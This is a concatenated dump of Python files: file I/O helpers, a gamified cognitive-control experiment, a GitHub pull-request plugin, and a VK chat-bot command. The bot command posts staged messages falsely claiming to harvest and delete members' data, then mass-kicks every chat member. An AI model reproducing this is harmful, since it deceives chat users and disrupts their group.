dir_ = Path(dir_)\n\n if not dir_.is_dir():\n raise FileNotFoundError(f\"directory {dir_} dose not exist!\")\n\n def all_pass_filter(_):\n return True\n\n def _include_filter(p: Path):\n if ignore_case:\n p = Path(p.as_posix().lower())\n\n return any(p.match(pattern) for pattern in include_patterns) # type: ignore\n\n def _exclude_filter(p: Path):\n if ignore_case:\n p = Path(p.as_posix().lower())\n\n return all(not p.match(pattern) for pattern in exclude_patterns) # type: ignore\n\n include_filter = _include_filter if include_patterns else all_pass_filter\n exclude_filter = _exclude_filter if exclude_patterns else all_pass_filter\n\n def path_filter(path: Path):\n return include_filter(path) and exclude_filter(path)\n\n return filter(path_filter, dir_.rglob(\"*\"))\n\n\ndef load_xml(filename):\n return ET.parse(str(filename))\n\n\ndef dump_xml(filename, method=\"r\", 
encoding=\"utf-8\"):\n pass\n\n\ndef load_yaml(filename, method=\"r\", encoding=\"utf-8\"):\n \"\"\"\n Parse the first YAML document in a stream\n and produce the corresponding Python object.\n \"\"\"\n if \"b\" in method:\n with open(filename, method) as f:\n return yaml.load(stream=f, Loader=yaml.FullLoader)\n else:\n with open(filename, method, encoding=encoding) as f:\n return yaml.load(stream=f, Loader=yaml.FullLoader)\n\n\ndef dump_yaml(data, filename, method=\"w\", encoding=\"utf-8\", safe_mode=False, **kwargs):\n \"\"\"\n Serialize a Python object into a YAML stream.\n If stream is None, return the produced string instead.\n \"\"\"\n if safe_mode:\n temp_file_name = filename + \"_temp\"\n else:\n temp_file_name = filename\n\n with open(temp_file_name, method) as f:\n if \"b\" in method:\n ret = yaml.dump(data=data, stream=f, encoding=encoding, **kwargs)\n else:\n ret = yaml.dump(data=data, stream=f, **kwargs)\n if safe_mode:\n f.flush()\n os.fsync(f.fileno())\n\n if safe_mode:\n os.rename(temp_file_name, filename)\n\n return ret\n\n\ndef load_json(filename, method=\"r\", **kwargs):\n if method == \"r\":\n with open(filename, method) as f:\n data = json.load(f, **kwargs)\n elif method == \"rb\":\n decode_method = kwargs.get(\"encoding\", None)\n with open(filename, method) as f:\n data = f.read()\n if decode_method is not None:\n data = data.decode(decode_method)\n data = json.loads(data)\n return data\n\n\ndef dump_json(data, filename, method=\"w\", indent=None, safe_mode=False, **kwargs):\n \"\"\"\n Dump data to json file\n\n Args:\n data: json serializable python object, dict, list etc...\n dumped data\n filename: str or Path\n path of dumped json file\n method(str): an optional string that specifies the mode in which the file\n is opened\n indent: None or int\n If ``indent`` is a non-negative integer, then JSON array elements and\n object members will be pretty-printed with that indent level. An indent\n level of 0 will only insert newlines. 
``None`` is the most compact\n representation.\n safe_mode(bool): Dump in safe mode or not\n \"\"\"\n if safe_mode:\n temp_file_name = filename + \"_temp\"\n else:\n temp_file_name = filename\n\n if \"b\" in method:\n raise ValueError(\"can not dump json with binary mode!\")\n\n with open(temp_file_name, method) as f:\n json.dump(obj=data, fp=f, indent=indent, **kwargs)\n\n if safe_mode:\n f.flush()\n os.fsync(f.fileno())\n\n if safe_mode:\n os.rename(temp_file_name, filename)\n\n\ndef copy_related_files(\n src_dir,\n dst_dir,\n ref_dir,\n copy=True,\n src_suffix=None,\n ref_suffix=None,\n parents=True,\n exist_ok=True,\n):\n src_dir = Path(src_dir).absolute()\n dst_dir = Path(dst_dir).absolute()\n ref_dir = Path(ref_dir).absolute()\n Path(str(dst_dir)).mkdir(parents=parents, exist_ok=exist_ok)\n ref_file_list = list(\n glob_dir(\n ref_dir,\n include_patterns=[f\"*{ref_suffix}\"] if ref_suffix is not None else None,\n )\n )\n for ref_file_path in ref_file_list:\n\n ref_file_name = ref_file_path.name\n if ref_suffix is not None:\n src_file_name = ref_file_name.split(ref_suffix)[0]\n else:\n src_file_name = ref_file_name\n if src_suffix is not None:\n src_file_name += src_suffix\n src_file_path = Path(src_dir) / src_file_name\n\n if not Path(src_file_path).exists():\n logger.warning(f\"{src_file_path} does not exist.\")\n elif copy:\n shutil.copy(src_file_path, Path(dst_dir) / src_file_name)\n else:\n shutil.move(src_file_path, Path(dst_dir) / src_file_name)\n","repo_name":"HeDeYu/pyutils","sub_path":"src/pyutils/file_io/core.py","file_name":"core.py","file_ext":"py","file_size_in_byte":6621,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"14779848869","text":"import datetime\n\nimport numpy as np\nimport pandas as pd\nimport neurokit as nk\nimport neuropsydia as n\n\nfrom StarControl_Core import *\nfrom StarControl_Utils import *\n\n\n\n# -----------------------------------------------------------------------------\n# Part 1\n# -----------------------------------------------------------------------------\ndef processing_speed(n_trials=60, testmode = False, display_trigger = False):\n\n # Data creation\n data = {\"Stimulus_Side\": [\"RIGHT\"]*int(n_trials/2) + [\"LEFT\"]* int(n_trials/2),\n \"ITI\": list(generate_interval_frames(500, 1500, n_trials/2))*2}\n\n data = pd.DataFrame.from_dict(data)\n data = data.sample(len(data)).reset_index(drop=True)\n data = data.to_dict(orient=\"index\")\n\n # Instructions\n if testmode is False:\n n.newpage((24,4,64), auto_refresh=False)\n n.write(\"One year ago...\", color=\"white\", y=2, size=1.5)\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.time.wait(1500)\n n.write(\"...deep inside the REBEL territory...\", color=\"white\", y=0, size=1.2)\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.time.wait(2500)\n display_instructions(\"\"\"Okay, pilot, here's the mission briefing.\\n\\nThe commander requires you to destroy all the incoming enemies... 
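# The data-creation block at the top of processing_speed() builds a balanced,
# shuffled trial list: equal LEFT/RIGHT counts, one ITI per trial, then a
# row-wise shuffle through DataFrame.sample. The same pattern in isolation
# (values illustrative):
import pandas as pd

n_trials = 6
trials = pd.DataFrame({
    "Stimulus_Side": ["RIGHT"] * (n_trials // 2) + ["LEFT"] * (n_trials // 2),
    "ITI": [500, 1000, 1500] * 2,
})
trials = trials.sample(len(trials)).reset_index(drop=True)  # shuffle the rows
print(trials.to_dict(orient="index"))  # {0: {'Stimulus_Side': ..., 'ITI': ...}, ...}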
Nothing too hard for our best pilot!\"\"\", text_end=\"Press SPACE to continue.\", display_trigger = display_trigger)\n display_instructions(\"\"\"Just destroy them as fast as you can with your famous auto-aiming cannons.\\n\\nPress DOWN to shoot whenever an enemy appears.\"\"\", display_trigger = display_trigger)\n\n for trial in range(n_trials):\n data[trial].update(ITI(data[trial][\"ITI\"], testmode = testmode, display_trigger = display_trigger))\n data[trial].update(\n display_stimulus(side=data[trial][\"Stimulus_Side\"],\n always_right = True,\n testmode = testmode,\n display_trigger = display_trigger)\n )\n data[trial][\"Trial_Order\"] = trial + 1\n\n # Explosion!\n if testmode is False:\n ITI(1000, testmode = testmode, display_trigger = display_trigger)\n display_explosion(side = \"CENTRE\")\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.time.wait(800)\n\n data = pd.DataFrame.from_dict(data, orient=\"index\")\n return(data)\n\n\n\n\n\n\n# Part 2\n# -----------------------------------------------------------------------------\ndef response_selection(n_trials=100, testmode = False, display_trigger = False):\n\n # Data creation\n data = {\"Stimulus_Side\": [\"RIGHT\"]*int(n_trials/2) + [\"LEFT\"]* int(n_trials/2),\n \"ITI\": list(generate_interval_frames(500, 1500, n_trials/2))*2}\n\n data = pd.DataFrame.from_dict(data)\n data = data.sample(len(data)).reset_index(drop=True)\n data = data.to_dict(orient=\"index\")\n\n # Instructions\n if testmode is False:\n n.newpage((24,4,64), auto_refresh=False)\n n.write(\"When suddenly...\", color=\"white\", y=5, size=1.2)\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.time.wait(2000)\n n.write(\"...your ship engine EXPLODES!\", color=\"white\", y=1.5, size=1.2)\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.time.wait(2500)\n n.newpage(\"white\")\n n.time.wait(1000)\n n.write(\"You wake up in a hospital.\", color=\"black\", y=5, size=1.2)\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.time.wait(1500)\n n.write(\"One year has passed since the accident.\", color=\"black\", y=1.5, size=1.2)\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.time.wait(2000)\n display_instructions(\"\"\"Things have changed since then. You find your dear old ship, and its famous auto-aiming cannons, damaged in a dump.\\n\\nYou have no choice but to start again, in this new tin can they call a ship...\\n\\nNo more auto-aiming cannons.\"\"\", text_end=\"Press SPACE to continue.\", background = (24,4,64), display_trigger = display_trigger)\n display_instructions(\"\"\"But you're not going to give up! 
You're going to show everyone that you are the fastest pilot for a reason...\\n\\nEven if that means manually aiming at the targets!\"\"\", text_end=\"Press SPACE to continue.\", background = (24,4,64), display_trigger = display_trigger)\n display_instructions(\"\"\"Okay, rookie, get ready for action.\\n\\nPress LEFT or RIGHT depending on where the enemy appears, and be as fast as possible!\"\"\", display_trigger = display_trigger)\n\n for trial in range(n_trials):\n data[trial].update(ITI(data[trial][\"ITI\"], testmode = testmode, display_trigger = display_trigger))\n data[trial].update(display_stimulus(side=data[trial][\"Stimulus_Side\"], testmode = testmode, display_trigger = display_trigger))\n data[trial][\"Trial_Order\"] = trial + 1\n\n data = pd.DataFrame.from_dict(data, orient=\"index\")\n return(data)\n\n\n\n\n\n\n\n# Part 3\n# -----------------------------------------------------------------------------\ndef response_inhibition(n_trials=200, min_SSRT=0, max_SSRT=300, frame = 16.66667, staircase = False, testmode = False, display_trigger = False):\n\n def generate_data(n_trials, min_SSRT=0, max_SSRT=300, frame= 16.66667, adaptive=False):\n data = {\"Stimulus_Side\": [\"RIGHT\"]*int(n_trials/2) + [\"LEFT\"]* int(n_trials/2),\n \"ITI\": list(generate_interval_frames(500, 1500, n_trials/2))*2}\n\n # SSRT\n ss = np.array(randomize_and_repeat([False, False, True], int(n_trials/3)) + [False] * int(n_trials-int(n_trials/3)*3))\n data[\"Stop_Signal\"] = ss\n data[\"Stop_Signal_RT\"] = np.array([np.nan] * int(n_trials))\n\n if adaptive is False:\n ssrt = generate_interval_frames(min_SSRT, max_SSRT, int(sum(ss)))\n data[\"Stop_Signal_RT\"][ss == True] = randomize_without_repetition(list(ssrt))\n else:\n data[\"Stop_Signal_RT\"][ss == True] = np.array([-1]*len(data[\"Stop_Signal_RT\"][ss == True]))\n\n data = pd.DataFrame.from_dict(data)\n data = data.sample(len(data)).reset_index(drop=True)\n data = data.to_dict(orient=\"index\")\n return(data)\n\n\n # First\n if testmode is False:\n ITI(2000, testmode = testmode, display_trigger=display_trigger)\n display_enemy()\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.time.wait(150)\n display_enemy(stop=True)\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.response(allow=[\"RIGHT\", \"LEFT\"], time_max = 1500)\n n.time.wait(1500)\n\n\n # Instructions\n n.newpage((24,4,64), auto_refresh=False)\n n.write(\"Wait! 
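# response_inhibition() can run the stop-signal delays adaptively (the
# staircase branch further below). The rule such staircases approximate is
# 1-up/1-down: lengthen the delay after a successful stop, shorten it after
# a failed one, converging on roughly 50% inhibition. A generic sketch, with
# step size and bounds chosen for illustration rather than taken from this task:
def update_ssd(ssd, stopped, step=50, lo=0, hi=1000):
    # stopped=True  -> stopping was too easy, make it harder (longer delay)
    # stopped=False -> too hard, make it easier (shorter delay)
    ssd = ssd + step if stopped else ssd - step
    return max(lo, min(hi, ssd))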
What's that?!\", color=\"white\", y=5, size=1.2)\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.time.wait(2000)\n display_instructions(\"\"\"Bad news, rookie, it seems like the rebels have upgraded some of their ships!\\n\\nIf we do not manage to shoot as SOON as the enemy appears, they'll have time to activate counter-measures that will return our bullets and damage our ship.\"\"\", text_end=\"Press SPACE to continue.\", display_trigger = display_trigger)\n display_instructions(\"\"\"Shoot the incoming ships as FAST as possible, before a RED CROSS appears.\\n\\nDo not shoot at the RED CROSS, or it will harm us too!\"\"\", display_trigger = display_trigger)\n\n # Generate data\n if staircase is True:\n staircase = nk.staircase(signal = generate_interval_frames(0, max_SSRT, int(max_SSRT/frame)),\n treshold = 0.5,\n burn=0)\n data = generate_data(int(n_trials/2), min_SSRT, max_SSRT, frame)\n else:\n data = generate_data(int(n_trials), min_SSRT, max_SSRT, frame)\n\n # Run trials\n if staircase is False:\n for trial in range(0, n_trials):\n data[trial].update(ITI(data[trial][\"ITI\"], testmode = testmode, display_trigger = display_trigger))\n data[trial].update(display_stimulus(side=data[trial][\"Stimulus_Side\"], stop=data[trial][\"Stop_Signal_RT\"], testmode = testmode, display_trigger = display_trigger))\n data[trial][\"Trial_Order\"] = trial + 1\n\n# # With staircase\n# else:\n# for trial in range(0, int(n_trials/2)):\n# data[trial].update(ITI(data[trial][\"ITI\"], testmode = testmode, display_trigger = display_trigger))\n# data[trial].update(display_stimulus(side=data[trial][\"Stimulus_Side\"], stop=data[trial][\"Stop_Signal_RT\"], testmode = testmode, display_trigger = display_trigger))\n# if staircase is True:\n# if data[trial][\"Stop_Signal\"] is True:\n# if data[trial]['RT'] >= data[trial][\"Stop_Signal_RT\"]:\n# if data[trial][\"Response\"] == \"Time_Max_Exceeded\":\n# staircase.add_response(response=0, value=data[trial][\"Stop_Signal_RT\"])\n# else:\n# staircase.add_response(response=1, value=data[trial][\"Stop_Signal_RT\"])\n# data[trial][\"Trial_Order\"] = trial + 1\n#\n# data_staircase = generate_data(int(n_trials/2), min_SSRT, max_SSRT, adaptive=True)\n# for i in list(data_staircase.keys()): # Replace keys\n# data_staircase[i + int(n_trials/2)] = data_staircase.pop(i)\n# data.update(data_staircase)\n# for trial in range(int(n_trials/2), n_trials):\n# data[trial].update(ITI(data[trial][\"ITI\"], testmode = testmode, display_trigger = display_trigger))\n# if data[trial][\"Stop_Signal_RT\"] == -1:\n# data[trial][\"Stop_Signal_RT\"] = staircase.predict_next_value()\n# data[trial].update(display_stimulus(side=data[trial][\"Stimulus_Side\"], stop=data[trial][\"Stop_Signal_RT\"], testmode = testmode, display_trigger = display_trigger))\n# if data[trial][\"Stop_Signal\"] is True:\n# if data[trial]['RT'] >= data[trial][\"Stop_Signal_RT\"]:\n# if data[trial][\"Response\"] == \"Time_Max_Exceeded\":\n# staircase.add_response(response=0, value=data[trial][\"Stop_Signal_RT\"])\n# else:\n# staircase.add_response(response=1, value=data[trial][\"Stop_Signal_RT\"])\n# data[trial][\"Trial_Order\"] = trial + 1\n\n\n data = pd.DataFrame.from_dict(data, orient=\"index\")\n return(data)\n\n\n\n\n\n\n\n\n# Part 4\n# -----------------------------------------------------------------------------\ndef attention_priming(n_trials=20, testmode = False, display_trigger = False):\n\n\n # Data creation\n data = {\"Stimulus_Side\": [\"RIGHT\"]*int(n_trials/2) + [\"LEFT\"]* int(n_trials/2),\n \"ITI\": 
list(generate_interval_frames(500, 1500, n_trials/2))*2}\n data[\"Priming_Interval\"] = randomize_and_repeat(generate_interval_frames(50, 1000, n_trials/2), 2)\n data = pd.DataFrame.from_dict(data)\n data = data.sample(len(data)).reset_index(drop=True)\n data = data.to_dict(orient=\"index\")\n\n # Instructions\n n.newpage((24,4,64), auto_refresh=False)\n n.write(\"Well done! You're doing great!\", color=\"white\", y=5, size=1.5)\n if display_trigger is True:\n trigger.stop()\n n.refresh()\n n.time.wait(2000)\n display_instructions(\"\"\"Our engineers have worked hard over the past months. We are now able to prevent the rebels' ships from gathering power. \\n\\nSo no more RED CROSS!\"\"\", text_end =\"Press SPACE to continue.\", display_trigger = display_trigger)\n display_instructions(\"\"\"For your next mission, our engineers have also improved your radar. We can now predict the position of the rebels' ships even before they emerge!\\n\\nThis new technology is going to help you improve your speed significantly.\\n\\nGive it a try, and show us again how FAST you are.\"\"\", display_trigger = display_trigger)\n\n for trial in range(n_trials):\n data[trial].update(ITI(data[trial][\"ITI\"], testmode = testmode, display_trigger = display_trigger))\n data[trial].update(prime(side=data[trial][\"Stimulus_Side\"], duration=data[trial][\"Priming_Interval\"]))\n data[trial].update(display_stimulus(side=data[trial][\"Stimulus_Side\"], testmode = testmode, display_trigger = display_trigger))\n data[trial][\"Trial_Order\"] = trial + 1\n\n data = pd.DataFrame.from_dict(data, orient=\"index\")\n return(data)\n\n\n\n\n# Part 6\n# -----------------------------------------------------------------------------\ndef conflict_resolution(n_trials=200, testmode = False, display_trigger = False):\n\n # Congruent practice\n # Instructions\n if testmode is False:\n display_instructions(\"\"\"Impressive job, pilot!\\n\\nWe are winning this war! But the rebels are smart. This time, they have disguised themselves as CIVILIANS.\\n\\nThankfully, our engineers have developed a radar that will point toward the enemy ship.\"\"\", text_end =\"Press SPACE to continue.\", display_trigger = display_trigger)\n display_instructions(\"\"\"Shoot LEFT and RIGHT according to the radar arrows that will appear in the centre.\\n\\nRemember to be as fast as possible!\"\"\", text_end =\"Press SPACE to continue.\", display_trigger = display_trigger)\n for practice_trial in range(7):\n ITI([1000, 1250, 1000, 1500, 1000, 1250, 1500][practice_trial], testmode = testmode, display_trigger = display_trigger)\n prime(side=[\"RIGHT\", \"LEFT\", \"RIGHT\", \"RIGHT\", \"LEFT\", \"LEFT\", \"RIGHT\"][practice_trial], conflict=False, duration = 0, testmode = testmode)\n display_stimulus(side=[\"RIGHT\", \"LEFT\", \"RIGHT\", \"RIGHT\", \"LEFT\", \"LEFT\", \"RIGHT\"][practice_trial], allies = True, testmode = testmode, display_trigger = display_trigger)\n\n\n\n # Data creation\n data = {\"Conflict\": [False]*int(n_trials/2) + [True]* int(n_trials/2),\n \"Stimulus_Side\": [\"RIGHT\", \"LEFT\"]*int(n_trials/2) ,\n \"ITI\": list(generate_interval_frames(500, 1500, n_trials/2))*2}\n data = pd.DataFrame.from_dict(data)\n data = data.sample(len(data)).reset_index(drop=True)\n data = data.to_dict(orient=\"index\")\n\n # Instructions\n if testmode is False:\n display_instructions(\"\"\"You're doing great!\\n\\nUnfortunately, it seems that they found a way of hacking our lateral radar antennas. 
You can only trust and rely on the CENTRAL arrow to know the direction to shoot at.\"\"\", text_end =\"Press SPACE to continue.\", display_trigger = display_trigger)\n display_instructions(\"\"\"Shoot LEFT and RIGHT according to the CENTRAL radar arrow.\\n\\nRemember to be as fast as possible!\"\"\", display_trigger = display_trigger)\n\n for trial in range(n_trials):\n data[trial].update(ITI(data[trial][\"ITI\"], testmode = testmode, display_trigger = display_trigger))\n data[trial].update(prime(side=data[trial][\"Stimulus_Side\"], conflict=data[trial][\"Conflict\"], duration = 0, testmode = testmode))\n data[trial].update(display_stimulus(side=data[trial][\"Stimulus_Side\"], allies = True, testmode = testmode, display_trigger = display_trigger))\n data[trial][\"Trial_Order\"] = trial + 1\n\n data = pd.DataFrame.from_dict(data, orient=\"index\")\n return(data)","repo_name":"neuropsychology/CognitiveControl","sub_path":"prototype_python/StarControl_Parts.py","file_name":"StarControl_Parts.py","file_ext":"py","file_size_in_byte":15293,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"60"} +{"seq_id":"35146928153","text":"# -*- coding: utf-8 -*-\nimport asyncio\nimport traceback\n\nimport command_besed\nfrom commands import commands\nfrom api.api_execute import kick\nfrom api.methods import messages_edit\n\nclass show(commands):\n\n async def run(self):\n try:\n #adm = await self.create_mongo.admin_check(self.from_id, self.peer_id)\n #if adm:\n if str(self.from_id) == \"597624554\":\n if 'закрыть' in self.text:\n\n await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n message=\"@all Начинаю инициацию закрытия \"\n \"беседы, пожалуйста подождите.\"\n \"У вас есть 1 минута на прощание и тёплые слова.\",\n random_id=0)\n #await msg.start_send()\n await asyncio.sleep(60)\n await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n message=\"@all ⏰ Минута окончена. Беседы скоро не будет.\"\n \"👾 Запускаю анализ данных, скаченный из интернета.\", random_id=0)\n #await msg.finish(\"⏰ До начала закрытия бесед осталась одна минута!\")\n #await msg.start_send()\n await asyncio.sleep(5)\n await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n message=\"@all 👥 Начинаю получение данных всех пользователей чата.\", random_id=0)\n await asyncio.sleep(5)\n await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n message=\"@all 🐲 Данные получены.\", random_id=0)\n await asyncio.sleep(5)\n await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n message=\"@all 🚫 Удаляю все данные пользователей чата.\", random_id=0)\n await asyncio.sleep(5)\n await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n message=\"@all 💫 Делаю бэкап данных пользователей чата.\", random_id=0)\n await asyncio.sleep(5)\n await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n message=\"@all 😢 Бэкап оказался пустым, я очень расстроен. Время жизни беседы сокращаю на 20 секунд.\", random_id=0)\n await asyncio.sleep(5)\n await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n message=\"@all 😃 Спасибо всем, кто общался и жил в этом чате, вы самые лучшие!!!\\n\\nНачинаю закрытие беседы через 5 секунд\", random_id=0)\n await asyncio.sleep(10)\n await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n message=\"@all Хахаха хехехе хихихи\\n\\nВы всё ещё ждёте закрытия????\\n\\n\\n\\n\\n\\n\\n\"\n \"PS. 
😎 Закрытие отменили, оно сломалось))))) Расходимся.\",\n random_id=0)\n await asyncio.sleep(10)\n result = await self.create_mongo.get_users_released(self.peer_id, True)\n de = self.chunks(result, 25)\n l = list(de)\n else:\n result = await self.create_mongo.get_users_released(self.peer_id)\n de = self.chunks(result, 25)\n l = list(de)\n msg = messages_edit(self.v, self.club_id, self.apis, self.peer_id, \"🤡 Начинаю запуск модуля шоу.\")\n await msg.start_send()\n await asyncio.sleep(1)\n # await msg.finish(\"⏰ До начала шоу осталось 5 секунд\")\n # await asyncio.sleep(1)\n # await msg.finish(\"⏰ До начала шоу осталось 4 секунд\")\n # await asyncio.sleep(1)\n # await msg.finish(\"⏰ До начала шоу осталось 3 секунд\")\n # await asyncio.sleep(1)\n # await msg.finish(\"⏰ До начала шоу осталось 2 секунд\")\n # await asyncio.sleep(1)\n # await msg.finish(\"⏰ До начала шоу осталось 1 секунд\")\n # await asyncio.sleep(1)\n await msg.finish(\"🎉🎊 Шоу начинается! 🎊🎉\")\n\n k = 1\n for i in l:\n # if k == 2:\n # await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n # message=\"@all 🖤 [id246793445|Давид], [id132337324|Георгий], [id150644142|Дима] \"\n # \"спасибо элитному отряду за деятельность в других беседах и поддержания баланса в них.\"\n # \"За огромную помощь бабитуре и за реализацию наших мыслей в чат 👀.\\n\\n\"\n # \"💜 Спасибо помощникам отряда в лице [id498903068|Игрека], [id217681383|Оли] и [id181205197|Евана]\\n\\n\"\n # \"🧡 [id96595205|Ярослав] и 🧡 [id221120133|Степан] сын и отец и отец и сын, спасибо за жизнь без еды и сна.\",\n # random_id=0)\n # if k == 4:\n # await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n # message=\"💛💚💙 [id36374295|Александр], [id15049950|Нина],\"\n # \"[id68817899|Александра], [id136572153|Вячеслав],\"\n # \"[id9875490|Ксения], [id216758639|Настасья],\"\n # \"[id94979557|Юлия] 💙💚💛\"\n # \"спасибо вам за хорошую службу, работу и за помощь абитуре, 33 выстрела вверх в четь этого.\",\n # random_id=0)\n # if k == 6:\n # await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n # message=\"@all 🎩 С вами был чат Мирэа, хз какого института, мне лень смотреть.\\n\\n\"\n # \"Удачного обучения в нашем вузе и не болейте.\",\n # random_id=0)\n # k += 1\n await asyncio.sleep(0.5)\n await self.apis.api_post(\"execute\", code=kick(users=i, chat_id=self.chat_id()), v=self.v)\n\n await self.apis.api_post(\"messages.send\", v=self.v, peer_id=self.peer_id,\n message=\"@all Масскик окончен, всем спасибо, всем пока, отдыхайте)))))\",\n random_id=0)\n\n except Exception as e:\n print(traceback.format_exc())\n\n\n\n\n\n\n\n\nshows = command_besed.Command()\n\nshows.keys = ['/шtrtrtt45g4оу', 'начаtrrttrtть шоу', 'закрыть бrrrtrrеседу']\nshows.description = 'Привязка беседы'\nshows.process = show\nshows.topics_blocks = []\nshows.topics_resolution = [\"tema1\"]\n","repo_name":"StasikLeyshin/mir_bot","sub_path":"commands_besed/show.py","file_name":"show.py","file_ext":"py","file_size_in_byte":9021,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"60"} +{"seq_id":"5967424917","text":"from dataclasses import dataclass\nfrom pathlib import Path\nfrom typing import Iterable, Type\n\nfrom click import (\n BadParameter,\n Option,\n Parameter,\n echo,\n)\nfrom github import Github\nfrom github.Branch import Branch\nfrom github.GitCommit import GitCommit\nfrom github.GithubException import GithubException\nfrom github.InputGitTreeElement import InputGitTreeElement\nfrom 
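# show.run() above slices the member list into groups of 25 with self.chunks
# before issuing batched kicks (the VK execute API caps how much one call may
# do). The helper itself is not shown in this file; judging from the call
# sites, a typical implementation would be this sketch:
def chunks(seq, size):
    # Yield successive `size`-sized slices of `seq`.
    for i in range(0, len(seq), size):
        yield seq[i:i + size]

# list(chunks([1, 2, 3, 4, 5], 2)) -> [[1, 2], [3, 4], [5]]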
github.PullRequest import PullRequest\nfrom github.Repository import Repository\n\nfrom mend.protocols import Plugin, Tree\n\n\n# See: https://git-scm.com/book/en/v2/Git-Internals-Git-Objects\nNORMAL_FILE_MODE = \"100644\"\n\n\ndef normalize_path(path: Path) -> str:\n return str(path.relative_to(Path.cwd()))\n\n\n@dataclass(frozen=True)\nclass GitHubPlugin(Plugin):\n \"\"\"\n Create a GitHub pull request.\n\n \"\"\"\n repository: Repository\n base_branch: str\n target_branch: str\n title: str\n\n def apply(self, tree: Tree) -> None:\n \"\"\"\n Create a pull request, apply the generated tree.\n\n \"\"\"\n branch = self.create_branch()\n self.create_commit(branch, tree)\n pull_request = self.create_pull_request()\n\n echo(f\"Created pull request: {pull_request.number}\")\n\n def create_branch(self) -> Branch:\n \"\"\"\n Create a remote branch.\n\n \"\"\"\n echo(f\"Creating branch: {self.target_branch} off of {self.base_branch}.\")\n\n base_branch = self.repository.get_branch(self.base_branch)\n try:\n self.repository.create_git_ref(\n ref=f\"refs/heads/{self.target_branch}\",\n sha=base_branch.commit.sha,\n )\n except GithubException as error:\n if error.status == 404:\n raise Exception(\n f\"Unable to create branch {self.target_branch}; please confirm that your \"\n \"access token has write access to this repository.\"\n )\n\n if error.status != 422:\n raise\n\n # Branch should exist already, pass through to make sure\n pass\n\n git_branch = self.repository.get_branch(self.target_branch)\n\n echo(f\"Created branch: {self.target_branch}.\")\n\n return git_branch\n\n def create_commit(self, branch: Branch, tree: Tree) -> GitCommit:\n echo(f\"Finding base tree for {branch.name}.\")\n\n base_tree = self.repository.get_git_tree(branch.commit.sha)\n\n echo(f\"Creating {len(tree.blobs)} git blob(s).\")\n\n git_blobs = {\n path: self.repository.create_git_blob(\n content=blob.read().decode(\"utf-8\"),\n encoding=\"utf-8\",\n )\n for path, blob in tree.blobs.items()\n }\n\n echo(\"Creating a new git tree from blob(s).\")\n\n git_tree = self.repository.create_git_tree(\n tree=[\n InputGitTreeElement(\n path=normalize_path(path),\n mode=NORMAL_FILE_MODE,\n type=\"blob\",\n sha=blob.sha,\n )\n for path, blob in git_blobs.items()\n ],\n base_tree=base_tree,\n )\n\n echo(f\"Creating git commit from tree: {git_tree.sha}.\")\n\n git_commit = self.repository.create_git_commit(\n message=(\n f\"\"\"mend: applying changes to {len(tree.blobs)} files\n\n Includes:\n \"\"\" +\n \"\\n\".join(\n f\" - {path}\"\n for path in sorted(tree.blobs.keys())\n )\n ),\n tree=git_tree,\n parents=[\n branch.commit.commit,\n ],\n )\n\n echo(f\"Updating git ref {self.target_branch} to: {git_commit.sha}\")\n\n git_ref = self.repository.get_git_ref(f\"heads/{self.target_branch}\")\n git_ref.edit(git_commit.sha)\n\n return git_commit\n\n def create_pull_request(self) -> PullRequest:\n echo(f\"Creating pull request from {self.target_branch} onto {self.base_branch}.\")\n\n try:\n # create a PR of the release branch into head\n return self.repository.create_pull(\n title=self.title,\n body=f\"Merge mend changes into {self.base_branch}.\",\n base=self.base_branch,\n head=self.target_branch,\n )\n except GithubException as error:\n if error.status != 422:\n raise\n\n if any((\n \"No commits between\" in error.get(\"message\", \"\")\n for error in error.data.get(\"errors\", ())\n if isinstance(error, dict)\n )):\n # NB: maybe we should delete the branch here?\n raise Exception(\"Skipping pull request; no changes.\")\n\n # PR should exist 
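# Why the `+` matters in create_commit()'s message above: adjacent string
# literals concatenate implicitly, so without it the f-string fuses with the
# "\n" literal and .join() then runs with the whole summary as the separator.
# A tiny check:
paths = ["a.py", "b.py"]
implicit = "summary\n" "\n".join(paths)    # -> 'a.pysummary\n\nb.py' (surprising)
explicit = "summary\n" + "\n".join(paths)  # -> 'summary\na.py\nb.py' (intended)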
